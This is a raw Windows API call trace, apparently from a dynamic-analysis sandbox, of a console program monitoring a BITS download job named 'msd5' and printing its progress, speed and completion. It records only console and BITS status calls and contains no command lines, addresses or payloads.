[0072.231] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0072.231] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f364 | out: lpConsoleScreenBufferInfo=0x6f364) returned 1
[0072.231] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x6f37c, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f37c*=0x5) returned 1
[0072.231] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0072.232] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f36c | out: lpConsoleScreenBufferInfo=0x6f36c) returned 1
[0072.232] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x6f384, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f384*=0x7) returned 1
[0072.232] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0072.232] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f360 | out: lpConsoleScreenBufferInfo=0x6f360) returned 1
[0072.233] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f378, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f378*=0x8) returned 1
[0072.233] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0072.233] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f368 | out: lpConsoleScreenBufferInfo=0x6f368) returned 1
[0072.233] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f380, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f380*=0x8) returned 1
[0072.233] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0072.234] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f35c | out: lpConsoleScreenBufferInfo=0x6f35c) returned 1
[0072.234] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x6f374, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f374*=0xc) returned 1
[0072.234] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0072.234] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f36c | out: lpConsoleScreenBufferInfo=0x6f36c) returned 1
[0072.235] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6f384, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f384*=0xa) returned 1
[0072.235] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0072.235] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f354 | out: lpConsoleScreenBufferInfo=0x6f354) returned 1
[0072.235] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6f36c, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f36c*=0xa) returned 1
[0072.236] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0072.236] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f35c | out: lpConsoleScreenBufferInfo=0x6f35c) returned 1
[0072.236] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f374, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f374*=0x8) returned 1
[0072.236] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0072.236] _vsnwprintf (in: _Buffer=0xe703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f380 | out: _Buffer="0") returned 1
[0072.236] _vsnwprintf (in: _Buffer=0xe703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f38c | out: _Buffer="1") returned 1
[0072.237] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f35c | out: lpConsoleScreenBufferInfo=0x6f35c) returned 1
[0072.242] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x6f374, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f374*=0x5) returned 1
[0072.242] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0072.243] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f364 | out: lpConsoleScreenBufferInfo=0x6f364) returned 1
[0072.243] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f37c, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f37c*=0x8) returned 1
[0072.243] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0072.243] _vsnwprintf (in: _Buffer=0xe703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f388 | out: _Buffer="0") returned 1
[0072.243] _vsnwprintf (in: _Buffer=0xe703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f38c | out: _Buffer="385024") returned 6
[0072.244] _vsnwprintf (in: _Buffer=0xe703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f388 | out: _Buffer="0") returned 1
[0072.244] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x6f374 | out: lpSystemTimeAsFileTime=0x6f374*(dwLowDateTime=0xdbabe130, dwHighDateTime=0x1d469c7))
[0072.244] _finite (_X=0x0) returned 1
[0072.244] _finite (_X=0x0) returned 1
[0072.244] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f334 | out: lpConsoleScreenBufferInfo=0x6f334) returned 1
[0072.244] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x6f34c, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f34c*=0x11) returned 1
[0072.244] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0072.245] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f340 | out: lpConsoleScreenBufferInfo=0x6f340) returned 1
[0072.245] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x6f358, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f358*=0xf) returned 1
[0072.245] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0072.245] _vsnwprintf (in: _Buffer=0x6f16c, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x6f130 | out: _Buffer="0.00 B/S") returned 8
[0072.245] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f384 | out: lpConsoleScreenBufferInfo=0x6f384) returned 1
[0072.246] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f39c, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f39c*=0x8) returned 1
[0072.246] CoTaskMemFree (pv=0x2183c0)
[0072.247] PeekMessageW (in: lpMsg=0x6fcf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6fcf8) returned 0
[0072.247] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x6fd20*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0072.635] PeekMessageW (in: lpMsg=0x6fcf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6fcf8) returned 1
[0072.635] TranslateMessage (lpMsg=0x6fcf8) returned 0
[0072.636] DispatchMessageW (lpMsg=0x6fcf8) returned 0x1
[0072.636] IBackgroundCopyCallback:JobModification (This=0x220cb0, pJob=0x20a6b4, dwReserved=0x0) returned 0x0
[0072.636] IBackgroundCopyJob:GetState (in: This=0x20a624, pVal=0x220cbc | out: pVal=0x220cbc) returned 0x0
[0072.636] KillTimer (hWnd=0x0, uIDEvent=0x7fbf) returned 1
[0072.636] IBackgroundCopyJob:GetType (in: This=0x20a624, pVal=0x6f3c0 | out: pVal=0x6f3c0) returned 0x0
[0072.637] IBackgroundCopyJob:GetProgress (in: This=0x20a624, pVal=0x220cc0 | out: pVal=0x220cc0) returned 0x0
[0072.638] IBackgroundCopyJob:GetPriority (in: This=0x20a624, pVal=0x6f3bc | out: pVal=0x6f3bc) returned 0x0
[0072.638] CoTaskMemFree (pv=0x0)
[0072.638] IBackgroundCopyJob:GetDisplayName (in: This=0x20a624, pVal=0x6f3d4 | out: pVal=0x6f3d4*="msd5") returned 0x0
[0072.639] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f37c | out: lpConsoleScreenBufferInfo=0x6f37c) returned 1
[0072.639] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x6f394 | out: lpNumberOfCharsWritten=0x6f394) returned 1
[0072.639] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x6f394 | out: lpNumberOfAttrsWritten=0x6f394) returned 1
[0072.640] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0072.640] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0072.640] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f368 | out: lpConsoleScreenBufferInfo=0x6f368) returned 1
[0072.640] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6f380, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f380*=0xa) returned 1
[0072.640] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0072.640] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f364 | out: lpConsoleScreenBufferInfo=0x6f364) returned 1
[0072.641] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x6f37c, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f37c*=0x5) returned 1
[0072.641] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0072.641] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f36c | out: lpConsoleScreenBufferInfo=0x6f36c) returned 1
[0072.641] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x6f384, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f384*=0x7) returned 1
[0072.641] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0072.641] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f360 | out: lpConsoleScreenBufferInfo=0x6f360) returned 1
[0072.642] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f378, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f378*=0x8) returned 1
[0072.642] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0072.642] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f368 | out: lpConsoleScreenBufferInfo=0x6f368) returned 1
[0072.642] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f380, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f380*=0x8) returned 1
[0072.642] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0072.643] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f35c | out: lpConsoleScreenBufferInfo=0x6f35c) returned 1
[0072.643] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0x6f374, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f374*=0xe) returned 1
[0072.643] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0072.643] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f36c | out: lpConsoleScreenBufferInfo=0x6f36c) returned 1
[0072.643] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6f384, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f384*=0xa) returned 1
[0072.643] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0072.644] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f354 | out: lpConsoleScreenBufferInfo=0x6f354) returned 1
[0072.644] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6f36c, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f36c*=0xa) returned 1
[0072.644] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0072.644] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f35c | out: lpConsoleScreenBufferInfo=0x6f35c) returned 1
[0072.644] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f374, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f374*=0x8) returned 1
[0072.644] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0072.645] _vsnwprintf (in: _Buffer=0xe703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f380 | out: _Buffer="0") returned 1
[0072.645] _vsnwprintf (in: _Buffer=0xe703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f38c | out: _Buffer="1") returned 1
[0072.645] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f35c | out: lpConsoleScreenBufferInfo=0x6f35c) returned 1
[0072.645] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x6f374, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f374*=0x5) returned 1
[0072.645] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0072.645] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f364 | out: lpConsoleScreenBufferInfo=0x6f364) returned 1
[0072.645] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f37c, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f37c*=0x8) returned 1
[0072.645] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0072.646] _vsnwprintf (in: _Buffer=0xe703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f388 | out: _Buffer="262144") returned 6
[0072.646] _vsnwprintf (in: _Buffer=0xe703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f38c | out: _Buffer="385024") returned 6
[0072.646] _vsnwprintf (in: _Buffer=0xe703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f388 | out: _Buffer="68") returned 2
[0072.646] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x6f374 | out: lpSystemTimeAsFileTime=0x6f374*(dwLowDateTime=0xdbe9c4f0, dwHighDateTime=0x1d469c7))
[0072.646] _finite (_X=0xfe6dbc53) returned 1
[0072.646] _finite (_X=0x64333ada) returned 1
[0072.646] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f334 | out: lpConsoleScreenBufferInfo=0x6f334) returned 1
[0072.646] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x17, lpNumberOfCharsWritten=0x6f34c, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f34c*=0x17) returned 1
[0072.646] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0072.646] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f340 | out: lpConsoleScreenBufferInfo=0x6f340) returned 1
[0072.646] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x6f358, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f358*=0xf) returned 1
[0072.647] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0072.647] _vsnwprintf (in: _Buffer=0x6f16c, _BufferCount=0xfe, _Format="%.2f KB/S", _ArgList=0x6f130 | out: _Buffer="441.81 KB/S") returned 11
[0072.647] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f338 | out: lpConsoleScreenBufferInfo=0x6f338) returned 1
[0072.647] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x6f350, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f350*=0xc) returned 1
[0072.647] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0072.647] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f340 | out: lpConsoleScreenBufferInfo=0x6f340) returned 1
[0072.648] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x6f358, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f358*=0x10) returned 1
[0072.648] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0072.648] _vsnwprintf (in: _Buffer=0x6f16c, _BufferCount=0xfe, _Format="%I64u Seconds", _ArgList=0x6f124 | out: _Buffer="0 Seconds") returned 9
[0072.648] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f384 | out: lpConsoleScreenBufferInfo=0x6f384) returned 1
[0072.648] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x9, lpNumberOfCharsWritten=0x6f39c, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6f39c*=0x9) returned 1
[0072.648] CoTaskMemFree (pv=0x2183c0)
[0072.649] PeekMessageW (in: lpMsg=0x6fcf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6fcf8) returned 0
[0072.649] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x6fd20*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0072.771] PeekMessageW (in: lpMsg=0x6fcf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6fcf8) returned 1
[0072.771] TranslateMessage (lpMsg=0x6fcf8) returned 0
[0072.771] DispatchMessageW (lpMsg=0x6fcf8) returned 0x1
[0072.771] IBackgroundCopyCallback:JobTransferred (This=0x220cb0, pJob=0x20a6b4) returned 0x0
[0072.771] IBackgroundCopyJob:GetState (in: This=0x20a624, pVal=0x220cbc | out: pVal=0x220cbc) returned 0x0
[0072.772] IBackgroundCopyCallback:JobModification (This=0x220cb0, pJob=0x20a6b4, dwReserved=0x0) returned 0x0
[0072.772] IBackgroundCopyJob:GetState (in: This=0x20a624, pVal=0x220cbc | out: pVal=0x220cbc) returned 0x0
[0072.772] IBackgroundCopyJob:GetType (in: This=0x20a624, pVal=0x6e330 | out: pVal=0x6e330) returned 0x0
[0072.773] IBackgroundCopyJob:GetProgress (in: This=0x20a624, pVal=0x220cc0 | out: pVal=0x220cc0) returned 0x0
[0072.774] IBackgroundCopyJob:GetPriority (in: This=0x20a624, pVal=0x6e32c | out: pVal=0x6e32c) returned 0x0
[0072.775] CoTaskMemFree (pv=0x0)
[0072.775] IBackgroundCopyJob:GetDisplayName (in: This=0x20a624, pVal=0x6e344 | out: pVal=0x6e344*="msd5") returned 0x0
[0072.775] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e2ec | out: lpConsoleScreenBufferInfo=0x6e2ec) returned 1
[0072.775] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x6e304 | out: lpNumberOfCharsWritten=0x6e304) returned 1
[0072.776] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x6e304 | out: lpNumberOfAttrsWritten=0x6e304) returned 1
[0072.776] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0072.776] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0072.776] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e2d8 | out: lpConsoleScreenBufferInfo=0x6e2d8) returned 1
[0072.776] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6e2f0, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6e2f0*=0xa) returned 1
[0072.776] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0072.777] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e2d4 | out: lpConsoleScreenBufferInfo=0x6e2d4) returned 1
[0072.777] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x6e2ec, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6e2ec*=0x5) returned 1
[0072.777] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0072.777] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e2dc | out: lpConsoleScreenBufferInfo=0x6e2dc) returned 1
[0072.777] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x6e2f4, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6e2f4*=0x7) returned 1
[0072.777] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0072.778] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e2d0 | out: lpConsoleScreenBufferInfo=0x6e2d0) returned 1
[0072.778] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6e2e8, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6e2e8*=0x8) returned 1
[0072.778] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0072.778] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e2d8 | out: lpConsoleScreenBufferInfo=0x6e2d8) returned 1
[0072.778] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6e2f0, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6e2f0*=0x8) returned 1
[0072.778] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0072.779] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e2cc | out: lpConsoleScreenBufferInfo=0x6e2cc) returned 1
[0072.779] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x6e2e4, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6e2e4*=0xd) returned 1
[0072.779] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0072.779] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e2dc | out: lpConsoleScreenBufferInfo=0x6e2dc) returned 1
[0072.779] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6e2f4, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6e2f4*=0xa) returned 1
[0072.780] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0072.780] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e2c4 | out: lpConsoleScreenBufferInfo=0x6e2c4) returned 1
[0072.780] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6e2dc, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6e2dc*=0xa) returned 1
[0072.780] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0072.780] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e2cc | out: lpConsoleScreenBufferInfo=0x6e2cc) returned 1
[0072.780] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6e2e4, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6e2e4*=0x8) returned 1
[0072.781] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0072.781] _vsnwprintf (in: _Buffer=0xe703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6e2f0 | out: _Buffer="1") returned 1
[0072.781] _vsnwprintf (in: _Buffer=0xe703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6e2fc | out: _Buffer="1") returned 1
[0072.781] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e2cc | out: lpConsoleScreenBufferInfo=0x6e2cc) returned 1
[0072.784] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x6e2e4, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6e2e4*=0x5) returned 1
